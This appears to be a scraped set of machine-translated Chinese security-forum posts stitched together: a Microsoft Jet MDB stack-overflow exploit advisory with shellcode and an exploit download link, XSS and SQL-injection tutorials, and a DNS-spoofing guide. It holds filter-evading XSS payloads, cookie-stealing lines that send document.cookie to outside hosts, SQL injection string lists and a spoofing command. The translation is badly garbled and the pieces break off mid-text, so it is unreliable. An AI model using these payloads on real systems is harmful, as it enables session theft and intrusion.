visit http://support.microsoft.com/kb/925330"

Disclosure Timeline:

2007.11.06 Vendor notified via email
2007.11.07 Vendor responded
2007.11.16 Advisory released

--EOF--

由cocoruder （ frankruder_at_hotmail.com ）
http://ruder.cdut.net

摘要：

一个远程代码执行漏洞，远程攻击者成功利用此漏洞
可以执行任意代码对受影响的系统。

受影响的软件版本：

微软office进入2003年sp3的windows xp sp2上（中文）
（其他版本也可能会受到影响）

详细资料：

当微软office准入解析1 mdb的文件，它会倒致
（ msjet40.dll ）来解析它。看到attched档案
" microsoft_jet_engine_mdb_file_parsing_exploit.mdb " ，它会造成
栈溢出漏洞，在以下代码：

(C:\Windows\System32\msjet40.dll, version is 4.0.8618.0)

text:1B0B72BB mov ecx, edx ; ecx=0x5200
.text:1B0B72BD mov esi, edi ; esi point
to the datas
.text:1B0B72BF mov ebp, ecx ; which
can be find in the mdb file
.text:1B0B72C1 lea edi, [esp+40h] ; edi point
to stack memory
.text:1B0B72C5 shr ecx, 2
.text:1B0B72C8 rep movsd ; stack overflow!!
.text:1B0B72CA mov ecx, ebp
.text:1B0B72CC mov eax, [eax+1]
.text:1B0B72CF and ecx, 3
.text:1B0B72D2 rep movsb

调试信息如下：

eax=05f5cb67 ebx=05e66458 ecx=00005200 edx=00005200 esi=05f5cd12
edi=0013db60
eip=1b0b72c5 esp=0013db20 ebp=00005200 iopl=0 nv up ei pl
nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00000216
msjet40!Ordinal55+0x23cd8:
1b0b72c5 c1e902 shr ecx,2
0:000> u eip
msjet40!Ordinal55+0x23cd8:
1b0b72c5 c1e902 shr ecx,2
1b0b72c8 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
1b0b72ca 8bcd mov ecx,ebp
1b0b72cc 8b4001 mov eax,dword ptr [eax+1]
1b0b72cf 83e103 and ecx,3
1b0b72d2 f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
1b0b72d4 8bb424d4000000 mov esi,dword ptr [esp+0D4h]
1b0b72db 8b4b28 mov ecx,dword ptr [ebx+28h]
0:000> db esi
05f5cd12 00 4f 00 53 00 7e 00 31-00 5c 00 56 00 42 00 41 .O.S.~.1.\.V.B.A
05f5cd22 00 5c 00 56 00 42 00 41-00 36 00 5c 00 56 00 42 .\.V.B.A.6.\.V.B
05f5cd32 00 45 00 36 00 2e 00 44-00 4c 00 4c 00 23 00 56 .E.6...D.L.L.#.V
05f5cd42 00 69 00 73 00 75 00 61-00 6c 00 20 00 42 00 61 .i.s.u.a.l. .B.a
05f5cd52 00 73 00 69 00 63 00 20-00 46 00 6f 00 72 00 20 .s.i.c. .F.o.r.
05f5cd62 00 41 00 70 00 70 00 6c-00 69 00 63 00 61 00 74 .A.p.p.l.i.c.a.t
05f5cd72 00 69 00 6f 00 6e 00 73-00 00 00 00 00 00 00 00 .i.o.n.s........
05f5cd82 00 00 00 00 00 12 01 2a-00 5c 00 47 00 7b 00 34 .......*.\.G.{.4
0:000> db edi
0013db60 09 00 00 00 01 00 00 00-18 00 00 00 9a 51 00 1b .............Q..
0013db70 86 ce 00 1b 00 c0 f5 05-02 00 00 00 e8 dc 13 00 ................
0013db80 22 7c 00 1b 0c 11 f4 05-e8 dc 13 00 c0 10 f4 05 "|..............
0013db90 3c cd 00 1b c0 10 f4 05-00 c0 f5 05 9c 78 e6 05 <............x..
0013dba0 e8 dc 13 00 05 10 92 7c-38 78 e6 05 eb cb 00 1b .......|8x......
0013dbb0 80 9f a4 05 b0 98 a4 05-01 00 00 00 f2 cb 00 1b ................
0013dbc0 9c 78 e6 05 e8 dc 13 00-4c dc 13 00 4c dc 13 00 .x......L...L...
0013dbd0 01 00 00 00 60 f3 00 1b-80 9f a4 05 02 00 00 00 ....`...........

长度0x5200足以使我们写数据到
地址所在seh酶处理指针，以使我们能够改写
SEH酶处理。我使用下列地址，以跳转到shellcode ：

1B0D4C42 FF55 0C call dword ptr [ebp+C]

这份施政报告，也是在msjet40.dll ，所以它可以绕过安全
特点seh酶在windows xp sp2中，并[ebp+0Ch] 恰好点
源数据。

调试信息：

eax=00000000 ebx=00000000 ecx=1b0d4c42 edx=7c9237d8 esi=00000000
edi=00000000
eip=1b0d4c42 esp=0013d750 ebp=0013d770 iopl=0 nv up ei pl
zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00000246
msjet40!Ordinal310+0x17e:
1b0d4c42 ff550c call dword ptr [ebp+0Ch]
ss:0023:0013d77c=0013e184
0:000> dd ebp
0013d770 0013d820 7c92378b 0013d838 0013e184
0013d780 0013d854 0013d80c 1b0d4c42 00140000
0013d790 0013d838 0013e184 7c957860 0013d838
0013d7a0 0013e184 0013d854 0013d80c 1b0d4c42
0013d7b0 00140000 0013d838 05f5f1b2 00000000
0013d7c0 00000000 05e66458 01000000 0013d774
0013d7d0 01c8281c 0013da04 7c92ee18 7c98d8a8
0013d7e0 ffffffff 7c98d886 7c969d18 04ba0000
0:000> db 0013e184
0013e184 75 06 74 04 42 4c 0d 1b-fc e8 44 00 00 00 8b 45 u.t.BL....D....E
0013e194 3c 8b 7c 05 78 01 ef 8b-4f 18 8b 5f 20 01 eb 49 <.|.x...O.._ ..I
0013e1a4 8b 34 8b 01 ee 31 c0 99-ac 84 c0 74 07 c1 ca 0d .4...1.....t....
0013e1b4 01 c2 eb f4 3b 54 24 04-75 e5 8b 5f 24 01 eb 66 ....;T$.u.._$..f
0013e1c4 8b 0c 4b 8b 5f 1c 01 eb-8b 1c 8b 01 eb 89 5c 24 ..K._.........\$
0013e1d4 04 c3 31 c0 64 8b 40 30-85 c0 78 0c 8b 40 0c 8b ..1.d. (at) 0..x (dot) . [email concealed]@..
0013e1e4 70 1c ad 8b 68 08 eb 09-8b 80 b0 00 00 00 8b 68 p...h..........h
0013e1f4 3c 5f 31 f6 60 56 89 f8-83 c0 7b 50 68 7e d8 e2 <_1.`V....{Ph~..

75 06| + |74 04| + |42 4C 0D 1B| + |FC E8 44 00 ...

{JNZ 6} + {JZ 4} + 1B0D4C42h + shellcode

相关内容在所附件

microsoft_jet_engine_mdb_file_parsing_exploit.mdb " ，是从
0 x3336开始的。

公告说，有些
网络空间供应商也可能受到影响的话，攻击者可以上传
asp和mdb的文件，并利用它通过服务器对象
" adodb.connection " 。

如何复制：

开放所附文件
microsoft_jet_engine_mdb_file_parsing_exploit.mdb "OFF接入
2003年sp3的关于windows xp sp2的，那么" calc.exe " ，将被处决，请
不使用开发为攻击。

所附文件是：

http://ruder.cdut.net/attach/ms_mdb_vul/microsoft_jet_engine_mdb_file_pa
rsing_Exploit.rar rsing_exploit.rar

md5散列： 73243b8823c8dc2c88ae0529ca13c4c6

厂商回应：

微软回答我表示，他们不会修复这个漏洞，
看来，他们不会承认的脆弱性，这是由
mdb的档案。

"你似乎是报告的一个问题，以文件类型微软
许多节目，如网络浏览器和
展望，自动阻止这些档案。欲知详情，请
访问http://support.microsoft.com/kb/925330 "

[翻译]XSS SQL注入

Fri, 20 Jul 2007 06:08:57 +0000

[翻译]XSS & SQL注入
本帖被 stealthwalker 设置为精华(2007-06-20)
文章作者：CyberPhreak
译文作者：黯魂 [S.S.T]
信息来源：脚本安全小组（www.cnsst.org）

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
X Web Security - XSS & more X
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

~介绍

在这篇文章中我将说明所有关于XSS以及更多相关的知识.通过这篇文档,我希望能让你明白什么是XSS,为什么使用XSS,以及怎样使用XSS.一旦你学会了,你将需要发挥自己的创造力,因为大多数人都修补了简单的XSS漏洞.但是他们所忘记做的是修补比XSS的一个字符串更多的漏洞,并且php中特殊安全机制被用来防御XSS,而取代他们自己的方法.同时我将阐述的不仅仅是XSS,而是所有的web安全.

XXXXXXXXXXXXXXXXXXXXX
X Table OF Contents X
XXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXX
X Cookie Editing X
X XSS X
X SQL Injection X
XXXXXXXXXXXXXXXXXXXX

~什么是cookie

cookie就是一块数据.一旦你浏览一个站点并且注册一个帐号,一个cookie就被设置以记录你的信息.cookie仅仅保存你登录的信息以使站点检测以前你是否登录过,如果不是,它就会检测你的用户名和密码的正确性,然后登录.比如说在一个夜总会,你买了一张票,他们就会给你一张卡.因此你可以进进出出而不用每次都买票.而cookies比你所能看到的要复杂得多.夜总会只能记住你一晚上,但是cookies却能记住你一辈子.

~警告&欺骗

那么现在你知道了cookie是什么...你如何看待它们?事实上,cookie编辑(修改)是最简单的方法之一.只要有一个浏览器,你就能够查看和编辑cookies,并且只需要一些基础的javascript知识.打开你的浏览器然后随便去一个网站吧,登录...现在输入javascript:alert(document.cookie).这时你应该可以看见一个用户名和密码.然而大多数站点现在都不使用cookies,而使用sessions.很遗憾,sessions不能被修改(服务端可以),不像cookies,一旦你修改了一个cookie你就可以欺骗你自己.现在让我们开始欺骗...假设你看到了一个警告框并且看到一些像这样的内容:

strusername=cnsst;strpassword=cnsst

此时假设你知道'bitch'是一个管理员,可是你不知道密码. 由于脆弱的安全机制你不需要密码:javascript:void(document.cookie="strusername=bitch")
现在输入:javascript:alert(document.cookie).那几乎非常接近cookie修改了...

~什么是XSS

XSS,或者CSS,不管你更喜欢怎样称呼它,XSS(CSS)都代表着跨站脚本.基本上意思就是你能以任何方式注入脚本,来让它完成你想要做的.通过XSS你也可以截获输入信息,像用户名,密码以及cookies.这都将被讨论,所以接下来将会有很多例子,我们这篇文章应该能够帮你在XSS上发挥自己的创造力.

~为什么使用XSS

很明显的问题,通过XSS你能在客户端和服务器端执行任何类型的脚本.然而XSS却不仅仅局限于执行脚本上,还能截获输入.输入类似:
你通过XSS截获输入,然后通过一个秘密文件把截获到的信息发送向你的站点.而这一切绝不是XSS所能实现的全部作用.XSS还能截获cookies.Cookies保存着有价值的信息,像用户名,密码等等.

~让我们开始吧…

我假定你知道html和javascript,而php知识也有帮助,但却不是必要的.让我们从这个php脚本开始.

XSS--跨站脚本

Copy code

$name = $_GET['name'];
echo("Hello $name");
?>

OK,我们应该都知道上面的代码有什么用...这是一个非常奇怪的脚本,没有一个人会在自己的站点上使用它(至少我没见过),但是它对初学者理解原理却真的很有用.来看看我输入后所得到的信息:

cnsst
"Hello cnsst!"

引号内的信息就是输出信息..注意看,现在我输入:

那么它将会弹出document.cookie!所以它是易受XSS攻击的!

现在我们已经对XSS有了一点了解,那让我们理解它.首先,脚本做的是取得你的输入然后粘贴它.嗯...也就是说我们能输入任何数据.所以?等等...任何数据...好的,你想问客户端和服务器端分别有什么语言? 让我告诉你,基本上客户端语言是建立在你客户端浏览器之上的:JavaScript,html, VBScript等等...

服务器端语言在另一边,不是建立在你客户端之上的,而建立在服务器之上,有php,asp等等...

已有一些方法注入php,稍后我将说明.现在先想想这怎样才能对我们有帮助?注入javascript?简单.比如说你正在编写一个网站程序,由于是你的站点,所以你能使用所有你想使用的javascript(JS).因此其他任何人也可以,因为XSS允许你让网站运行你想要运行的任何脚本.

让我们看一个稍微复杂点的例子!

假设你已经输入了,并且回显是这样的:
scriptalert(document.cookie)/script
或者可能是这样的:
scriptalertdocument.cookie/script

可以看出更难利用了...不过有很多方法使用XSS,这只是其中一种.而且是其中最烂的方法之一.你看到当中的"<>"都被空字符" "替换了.

让我们继续利用:
<>

你的输出将弹出document.cookie.

现在来看看更狠的:
<>>

他们可能替换2对来欺骗你,或者替换一些字母.试着用你自己的方法来利用...你输入:

输出像这样:srplert(document.cookie)srp

仔细观察,你就会发现document.cookie中并没有什么被替换.为什么呢? 因为他们并不清楚你想要alert什么,以及你想做什么.所以他们只是猜测,就只阻止了"<>"以及script部分.怎么绕过?看看这个:
<>aalert(document.cookie)<>

所有重复多余的部分刚好被替换!现在让我们来点更高级的!

这次他们使用的仍然是替换,但是却检查了整个字符串!例如:

输出将是:
scriptalert(document.cookie)script

看到这,你激动地说,"我知道该怎么做了!" OK,让我们按照你的方法来重新构造:
<>

输出:scriptalert(document.cookie)script. 这时你可能会继续增加更多的<>.可是,他们替换了任何"<>",无论你输入多少个...看到我说"任何"了吗?使用下面这个例子:

<
script
>
alert
(
document
.
cookie
)
<
/
script
>

看看它,它没有替换"<>",它替换代码关键字.所以即便你写的是一句没有"<>"的代码,将仍然被替换,这就是我们为什么这样写的原因.假如对方使用更严格的标准,替换任何类型的代码,甚至是"alert"! 我们又该怎么改进呢?看看这个:
<
s
c
r
i
p
t
>
a
l
e
r
t
(
d
o
c
u
m
e
n
t
.
c
o
o
k
i
e
)
<
/
s
c
r
i
p
t
/
>

这下应该可以了,但是如果他们仍然替换"<",你可以增加2对"<< >>"(并且你可以用任何字符取代document.cookie)

还有更多我可以演示的替换,但是我教你的只是想让你发挥自己的创造力.

现在让我来讲讲其他XSS方法.前面我们已经讨论了客户端XSS,那么现在就来看看服务器端XSS.

首先让我说明它们之间的区别.客户端是从你浏览器经解释语言,如JavaScript (JS) VBScript (VBS)等而看到的.服务器端XSS是通过来自服务器端的语言,如php,asp等的XSS.客户端通过浏览器查看,服务器端通过服务器查看.

我们已经学会了怎样构造客户端XSS,而构造服务器端我们必须注入脚本到服务器上.要完成这个,我们需要找到一个像任何XSS的脚本,但是这个脚本能够保存你的XSS到服务器中.现在,假设你在一个网站上发表了一篇文章,现在要做的是取代文章,用XSS,为什么我们应该用JavaScript?为什么不用php?但是先让我给你看点东西.
document.forms(0).action ="http://myserver/myscript.php
这既能在服务器端也能在客户端,没有关系.因此你的脚本将复制他们所输入的信息到那个表单中,并保存在我们站点上的一个*.txt文件中.

再次假设你在网站上注册了一个帐号,并且可以自定义资料...
document.images(0).src="http://myserver/cookie.php"+document.cookie.
或者如果你有空间可以存放指向自定义内容的链接,你可以输入:
javascript:location.href="http://myserver/cookie.php"+document.cookie
这将截获访问我们资料的用户的cookie.这可以用于任何地方而不仅仅在资料上,它只是一个例子.

有时一个站点会回显你的UserAgent和Referer...现在让我们在DOS提示符下或者命令行窗口中试一试一些XSS,

Quote:
telnet example.com
GET /page/toplacewhere_itechos_your_useragent.php HTTP/1.1
User-Agent:
Referer:

~什么是SQL注入

SQL注入,网站中最大的安全问题之一.那么到底什么是SQL注入?其实也就是注入SQL.现在让我们来挖掘不同级别的SQL漏洞.假设你有一个像这样的登录页面:

Copy code

这里面有一个XSS漏洞,但是不用担心它,没有办法猜出或者破解出密码.所以,我们该怎么办?SQL注入!

最简单的攻击是在用户名和密码那里输入"'".如果没有保护机制,此时你应该得到一个错误信息.如果你得到了,它就是极易受攻击的.可是错误信息毫无价值,除非你知道如何利用它.所以,我会给你一个你可以使用的注入列表,以便在你得到一个单引号的错误信息时使用.

'='
'OR 1=1--
'OR a=a--
'OR'

自从人们增强安全性以后,现在这些注入就很难发挥作用了,但是下面这个列表却是很多人在安全列表里没有注意到的:

'OR''='
'OR"="
'OR'="
'OR '="
'OR "='
'OR ''='
'OR '=''
'OR "=''
'OR ''="

~
现在让我说明UNION ALL SELECT声明,这将选出数据库中的一个表...所显示的内容取决于你所选择的列.
UNION ALL SELECT username,password FROM users

这个查询语句将执行,但是….如果毫无作用呢?
UNION ALL SELECT username,password FROM users WHERE username='OR "='
AND password='OR "='

你可能使用其他字符来替代'OR "='以注入存在的注入点.可是首先考虑一下,你是怎么知道表名的?实际上,你发现了一个SQL漏洞,它给了你错误信息,而错误信息包含了表名.

一旦你发现了漏洞,你就会按照习惯去用类似'OR "='的方法去进行注入,以得到表名.有时候你想从表中查询一些有用的数据,你却不得不选择所有的表,因为你并不知道所要查询的数据在哪个表里.下面的例子中存在20个不同表名的表,你试图查询一个ip的列表:
UNION ALL SELECT
ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip FROM logs
WHERE ip='OR''="

现在你看到这个了吗?(我确信你已经看到了)
http://example.com/index.php?article=34
那将浏览Id为34的文章...让我们用"'"替换34:
http://example.com/index.php?article='

现在,记住我所说的,大多数人都没有意识到'所带来的不安全性,你总是能够尝试不同的注入方法,这里是一些例子:
http://example.com/index.php?article='
http://example.com/index.php?article='='
http://example.com/index.php?article='OR 1=1--
http://example.com/index.php?article='OR a=a--
http://example.com/index.php?article='OR '="
http://example.com/index.php?article='OR "='
http://example.com/index.php?article='OR ''='
http://example.com/index.php?article='OR '=''
http://example.com/index.php?article='OR''='
由NetElemental

目录
1.Why 这被写了。
2.The 宗旨。
3.The 文丐。
4.The 结果的危险。
5.The 解答。
6.Resources

1. 为什么这被写了
对我发怒站点scripting 是, 除或许社会工程学之外, 最大的威胁对联机用户那些日子。许多站点, 包括被使用得这里的未公开的站点, 是脆弱的横渡站点scripting 。未公开的站点特此将知道作为victim.com 。我有并且, 作为第二个目标, 给机敏的victim.com 被写本文关于他们的安全孔和怎么他们能修理他们。当我现在看, 站点有109,000,000+ 用户并且它使我惊奇这个缺点以前未被发现。我并且看创造嘲笑, 没有相似对原始的站点, 当然, 我发布给安全社区hackthissite.org 如果他们想要它或在我自己的站点如果他们不。当您读这的时候, victim.com 已经大概修理我突出在本文里的安全孔。我递交这给victim.com 以一个星期去在我发布本文给互联网和所有它的居住者之前。我只将公布victim.com 的名字以他们的允许并且好有一个小部分, 甚至一个评论在原始代码, 阐明, 站点受益于我的帮助(IMG:style_emoticons/default/wink.gif)

2. 宗旨
在这个例子, 我们的受害者站点允许您创造' 有他们自己的规则的微型' 社区, 等级, 闲谈上, 和可能有竞争和这样。这些社区得到一个小地方, 他们能安置HTML 使他们的社区看起来更好, 并且更适合题材。例如, 爱狗的社区也许使用HTML 投入狗的图片到处。我并且会希望注意此时, 这是很可能multibug, 尽管有其它地方您能投入HTML 为其他人对看法和我怀疑站点有唯一安全作用或组。
我们将试图剥削他们让您使用HTML 以便我们能注射Java 语言。如果我们能注射Java 语言, 我们能实际上接管用户帐号和或者用途Java 语言自动地操作用户帐号, 譬如迫使用户参加社区是否他们要对或不是如果他们非常作为神色在首页, 或窃取用户的' 点的由使他们买一个昂贵的项目由用户。这能并且使用改用户方向到色情网站或网站安置virii 、spyware 、adware, 或其它恶意内容在用户的计算机。

3. 文丐
好因此我们知道我们能使用HTML, 但他们说他们不允许是的Java 语言因此我们看多么真实。我们首先开始与简单的材料, 以便我们开始与剧本标记的手段。

代码
< script>alert('0wned')

收效的HTML

代码
- 阻拦alert('XSS') 阻拦

Hmm 因此他们实际上阻拦剧本标记! 真是惊奇! 好那么其次若我们能投入与某一Java 语言将连接的链接?

代码
< href=4a..java script:alert('0wned')4a..>Click Here

收效的HTML

代码
- 阻拦点击Here

Ahh k 他们如此过滤那也是。我看见, 他们如此虽则删掉了整个< a > 标记若我们投入了Java 语言在图象呢?

代码
< img src=4a..java script:alert('0wned')4a../>

但等待... 错误信息! src 标记对结束被限制按某些价值! (笔记: 这个错误信息被修改保护原始的站点的身分。
行情

抱歉! src 嵌入文件也许只结束在:

mp3
jpeg
gif
bmp
midi
wav
jpg
mid
png

您不可以使用任何< src=alink > 标记的形式埋置结束的文件

4a..java script:alert(0wned 从url: 4a..java script:alert(0wned

既使您没有使用' img src ', 这仍然适用于有' src ' 在他们的所有标记。例如, ' 背景src ' 。

什么关于如果我们曾经一个评论绕过这过滤器?

< img src=4a..java script:alert('0wned')//.gif4a../>

收效的HTML
代码

- 阻拦

好, 那么现在是我们开始真正的过滤器躲避的地方。我们若使用盖帽尝试和绕过看只为同样案件串的过滤器?

代码
< img src=4a..JaVa ScRiPt:alert('0wned.gif')4a../>

收效的HTML

代码
- 阻拦

好, 我们若注射了不吉利的东西呢? 您需要工具做这。我推荐打嗝代理人, 运行在localhost:8080 将让您观看, 阻拦, 和修改请求的代理人。

代码
< img src=4a..%6.a%41%76%41%73%43%72%49%70%54:alert('owned.gif')4a../>

收效的HTML

代码
- 阻拦

Uh oh 他们仍然得到了我们... 我们改变大头钉。我们使用DIV

代码
< DIV STYLE="background 图象: url(java script:alert('0wned '))">

收效的HTML

代码
- 阻拦

Hmm 到目前为止看起来它寻找任一个标记以' Java 语言' 在它。我们若破坏它呢?

代码
< DIV STYLE="background 图象: url(j

ava    scri
pt:alert('0wned '))">

不要问我为什么但这是合法的javascript/HTML 在IE 。我使用firefox 因此我必须交换对IE 测试这。收效的HTML
代码

< DIV STYLE="background 图象: url(j

ava     scri
pt:alert('0wned '))">

立刻在看见这我交换了对IE 和猜测什么? 信息框给权了' 0wned ' 突然出现! 那么下步: 简单, 明显的曲奇饼grabber

代码
< DIV STYLE="background 图象: url(j

ava    scri
pt:document.location=http://netelemental.no-ip.org/cookie.php?cookie='+document.cookie)">

收效的HTML
代码

< DIV STYLE="background 图象: url(j

ava     scri
pt:document 。     location=http://netelemental.no-ip.org/cookie.php?cookie='†document 。     曲奇饼))">

我们设法使用eval 通过这。

代码
< DIV STYLE="background 图象: url(j

ava    scri
pt:eval("docu" +"ment.location=http://netelemental.no-ip.org/c.php?c = ' +doc"+"ument.cookie"))">

收效的HTML:

代码
< DIV STYLE="background 图象: url(j

ava     scri
pt: 阻拦"docu"†"ment.location=http://netelemental.no ip.org/c.php?c = ' †doc"†"ument.cookie4a..))" >

好因此他们改变文件和eval 以便它使Java 语言无用当同时不影响一个合法的文件的神色。好, 我们若转换了这成HTML 不吉利的东西, 因为它是在CSS 声明?

代码
< DIV STYLE="background 图象: url(j

ava    scri
pt:document.E;l
->ocation='ht
->tp.A;//netele
->mental.E;no-i
->p.E;org/cooki
->e.E;php?cooki
->e='+documen
->t.E;cookie)">

收效的HTML

代码
< DIV STYLE="background 图象: url(j

ava     scri
pt:document.E;l
->ocation='ht
->tp.A;//netele
->mental.E;no-i
->p.E;org/cooki
->e.E;php?cooki
->e='+documen
->t.E;cookie)">

猜测什么? 我们食用曲奇饼! 我尝试了并且这有效。您能简单地现在使用Java 语言您的知识做任何您要。因为我并且发现了其它方式做这, 我将继续和将透露它。

代码
< DIV STYLE="width: expression(document.E;
->location='h
->ttp.A;//netel
->emental.E;no-
->ip.E;org/cook
->ie.E;php?cook
->ie='+docume
->nt.E;cookie)">

收效的HTML

代码
< DIV STYLE="width: expression(document.E;
->location='h
->ttp.A;//netel
->emental.E;no-
->ip.E;org/cook
->ie.E;php?cook
->ie='+docume
->nt.E;cookie)">

4 。结果的危险
您能看, 一次注射, 意味攻击者罐头' 注册' 作为用户由化妆那些曲奇饼作为攻击者的自己的Java 语言可能窃取用户的曲奇饼。特别是如果admin 得到了他们的曲奇饼被窃取, 这是巨大的危险对站点。它无法妥协服务器, 但是它可能减弱可能被诱使入观察呼叫的任一个用户帐号。并且他们不要的作用譬如document.forms[x].submit() 可能迫使用户改变设置或进行行动。真正地想要完全控制的攻击者能甚而使用AJAX 对mimick 用户能进行的任一次行动。

5. 解答
简单。简单地修改过滤器转换这样的HTML 不吉利的东西回到ascii, 和持续应用正常过滤器。并且投入额外过滤器在CSS 以便CSS 无法在将来是问题的来源, 前确定唯一某些CSS 标记被使用。改善, 创造您自己的样式标记语言禁止不需要的标记。另, 巨大解答是迫使您用户使用浏览器除Internet Explorer 之外。请注意, 这些XSS 盘剥运作只在IE 。

6. 资源
http://centricle.com/tools/ascii 不吉利的东西 //A 伟大的Ascii 不吉利的东西转换工具
http://ha.ckers.org/xss.html //THE 指南对于XSS, 小例子, thousands(not 逐字地)
//The 地方去学会更多XSS

[翻译]DNS（域名服务器）欺骗技术

Tue, 17 Jul 2007 17:47:44 +0000

文章作者：Spacefox, Secure Sphere Crew
译文作者：Conan, OS3 (Open Source Software Society) / CICC Singapore(Center of International Cooperation for Computerization in Singapore)
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

概述：什么是DNS欺骗？
DNS欺骗是一门改变DNS原始指向IP的艺术。为了更好的理解，让我们先来看一个例子。如果你想用浏览器去google搜索一些信息，毫无疑问的你会在地址栏里输入

www.google.com

的网址然后回车。
那么在这背后又有什么事情正在进行着呢？一般而言，你的浏览器将会向DNS服务器发送一个请求，从而要求得到与

www.google.com

相匹配的IP地址，DNS服务器则会告诉你的浏览器google的IP地址，接着你的浏览器会连接并显示主页内容。哦，等一下，你打开的网页说google因无钱支付网站费用而转让给

CSite

的消息。你可能会非常吃惊，并打电话告诉你的好朋友。当然你的朋友一定会笑你疯掉了，因为你的朋友是可以登陆google并进行搜索的。还确信正在和你通信的IP地址是友好的吗？说不定你已成圈中之羊。当你在浏览器地址里输入http:// 66.249.89.99并回车时，你又会发现，其实

www.google.com

还健在。
其实刚刚就是DNS劫持攻击时目击者可能看到的情形。
Quote:
试想如果跳转的页面被无声无息地挂着马又会多糟糕
非常急切地相要知道着其中地玄机吧？是不是DNS服务器给了我们一个错误地IP地址？可能是吧。至少，这是我们脑中最符合逻辑地答案。
按此在新窗口打开图片

事实上，有两种方法可以实现DNS劫持攻击。让我们来看看第一种，“DNS ID欺骗”技术。
A)DNS 高速缓冲存储器麻痹（DNS Cache Poisoning）
可以想象，DNS服务器不可能将所有现存的域名或IP地址存储在本身的存储空间里。这就是为什么DNS服务器有一个高速缓冲存储器（cache），它使得服务器可以存储DNS记录一一段时间。
事实上，一台DNS服务器只会记录本身所属域中的授权的主机，如果它想要知道其它的，在自身域以外主机的信息，就必须向信息持有者（另一台DNS服务器）发送请求，同时，为了不每次都发送请求，这台DNS服务器会将另一台DNS服务器返回的信息又记录下来。
那么现在，我们就来看看是怎么麻痹DNS的缓存的。
攻击者有自己的域（attacker.net）和一个已被攻陷的DNS服务器（ns.attacker.net）。注意！我说的是被攻陷的DNS服务器，因为攻击者已经自定义了他自己的DNS服务器的记录，比如，记录可以是

www.google.com=81.81.81.81

1)攻击者向你的DNS服务器发送请求查询

www.attacker.net
2)你的DNS服务器不知道这台主机的IP地址，因为他不属于本身域，所有你的DNS服务器就会问此主机的所属域的DNS服务器。
3)这时被黑DNS服务器就会回复你的DNS服务器，在此同时它也会给出它所有的记录（包括连接

www.google.com

的记录）
注意，这个过程叫做zone transfer.

按此在新窗口打开图片

4)这是你的DNS服务器还没有被麻痹。攻击者得到了自己的IP地址，但是他的目标不是得到自己网络服务器的地址，而是逼迫zone transfer进行以使你的DNS服务器麻痹直到其缓存不会被清楚或更新。

按此在新窗口打开图片

5)现在如果你再问你的DNS服务器关于

www.google.com

的IP地址，它会告诉你172.50.50.50，这也正是攻击者的服务器所在！现在，攻击者就能为所欲为，例如挂马什么的……当然这也对google造成了相当的损失！
B)DNS ID欺骗（DNS ID Spoofing）
我们可以看到，当主机X要与主机Y联系是需要近来的IP地址。然而在绝大多数情况下，X只有Y的名字，这样，DNS协议就是来解决名字到IP地址的问题的。
因此，X就会向它所在域的DNS服务器询问Y的IP地址。其间，主机X分配一个随即数，这个数也将会出现在从DNS服务器返回的信息里。当X收到回复后，X会对比两个数字，如果一致，则收到信息被视为有效。
那这样一个模型是否安全呢？并非十分安全。任何人都可以组织一次攻击来获得这个ID。举例说如果你用LAN，别人就可以利用嗅探器捕获你的请求ID，然后根据这个ID伪造一个回复信息……但是信息里含有攻击者所选的IP地址。然后，不加识别的，X会吧攻击者提供的IP地址当作Y的。
顺便提一句，DNS协议的提出请求是依赖于UDP的（只有在zone transfer时才用TCP），这也就意味着发送一个伪造的包是极其简单的，因为没有SYN/ACK号（不像TCP，UDP没有提供一个小型防IP欺骗的防护）

按此在新窗口打开图片

按此在新窗口打开图片

但是，这样的攻击是被局限的。在我以上的例子中，攻击者用嗅探器拦获ID，回复构造过的包给受害主机。
换句话说，即使攻击者拦截了请求，数据包还是会传去DNS服务器，而DNS服务器也照样会回复（除非攻击者拦截并阻止对网关的请求或实施ARP缓存麻痹才可能在转换网络中攻击）。
这就意味着攻击者必须在真DNS服务器前回复，即为了攻击成功，攻击者必须和被攻击者同一个LAN，只有这样他才可以获得快速的ping并且捕获对方的数据包。
实践举例（仅作测试目的）
看怎么劫持我们本地网络连接：
1、麻痹被攻击者的ARP缓存（具体的工具和说明可以在

http://www.arp-sk.org

上找到）
2、此时，目标主机的出口数据包将会重定向到你的主机上，但是还必须转发给真正的网关。我们可以用类似Winroute Pro的工具来实现。
3、为了实施DNS ID欺骗我们用valgasu开发的工具

WinDNSSpoof

（在使用这个工具前请先安装Winpcap，见

http://winpcap.polito.it

）
命令行下输入类似的命令：
wds -n

www.google.com

-i 123.123.123.123 -g 00-C0-26-DD-59-CF –v
这个命令会使目标主机的

www.google.com

指向123.123.123.123。
其中00-C0-26-DD-59-CF是网关或DNS服务器的MAC地址。
Tips: 在Windows NT内核下，查询远程IP的MAC地址可以在CMD里用nbtstat -A xxx.xxx.xxx.xxx命令
警告：记住！在未授权的情况下使用这些手段是被禁止的！
C)借助生日悖论的精确攻击
什么是“生日悖论”？
“生日悖论”得名于一个能产生奇怪现象的数学模型，即如果有23人在一起，那么很有可能其中的两人有相同的生日。其实要理解也不是那么困难。
假设现在你在一个派对问某人他的生日，那么他跟你不同生日的几率就是364/365=0.997，则相同的概率就是1-364/365=0.003。
现在，如果你再问另外一个人，他的生日不同于前一人且不同于你的概率就是(364/365)*(363/365)=0.992，所以我们至少可以推得我们中两人有相同生日的概率为1-0.992=0.008。
如果我们继续这样的推算，很快就能算得23人中有两人的生日相同的概率高达50％。我们可以通过以下的C代码看出概率是如何趋近于1的。

Copy code

#define POSSIBILITIES 365.0
void main (void)
{
float chances;
int i, j;
for (i = 1; i
没法编译的朋友可以看下面的结果：
People
2
9
16
23
30
37
44
65
79
Chances
0.0027
0.0946
0.2836
0.5073
0.7063
0.8487
0.9329
0.9977
0.9999
没法编译的朋友可以看下面的结果：

生日悖论普遍的应用于检测哈希函数:N-位长度的哈希表可能发生碰撞测试次数不是2N次而是只有2N/2次。这一结论被应用到破解密码学散列函数的生日攻击中
